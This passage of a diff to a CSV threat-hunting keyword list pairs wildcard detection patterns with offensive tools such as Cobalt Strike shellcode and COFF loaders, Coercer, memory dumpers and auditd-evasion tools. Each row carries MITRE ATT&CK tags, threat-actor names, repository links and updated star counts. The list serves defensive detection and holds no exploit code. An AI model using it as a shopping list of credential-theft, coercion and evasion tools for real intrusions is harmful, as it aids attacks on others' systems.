T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*CodeLoad(shellcode)*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","0","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*codeLoader/codeLoader.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" @@ -8611,18 +8759,18 @@ "*codewatchorg/sqlipy*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*codewhitesec/apollon*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*codewhitesec/daphne*","offensive_tool_keyword","daphne","evade auditd by tampering via ptrace","T1054.004 - T1012 - T1057","TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/daphne","1","1","N/A","8","1","12","2","2023-08-03T08:31:40Z","2023-07-31T11:57:29Z" -"*Coercer coerce*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" +"*Coercer coerce*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" "*coercer -d * -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Coercer fuzz*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*Coercer scan*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.core*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.models*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.network*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*Coercer.py *","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer.structures*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer/core/loader*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*coercer_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Coercer fuzz*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer scan*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.core*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.models*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.network*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*Coercer.py *","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer.structures*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer/core/loader*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*coercer_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*coff_definitions.h*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_Loader.*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*COFF_PREP_BEACON*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" @@ -8633,11 +8781,11 @@ "*coffexec *.o *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*COFFLdr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*COFFLdr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" -"*COFFLoader.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" -"*COFFLoader64.exe*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*COFFLoader.*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*COFFLoader64.exe*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*CognisysGroup/HadesLdr*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" -"*coinomi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*coldfusion_dir_traversal_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*coinomi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*coldfusion_dir_traversal_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*Collection/MiniDumpWriteDump.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -8645,30 +8793,30 @@ "*com_exec_go(*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*combine_harvester-main*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*com-exec.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 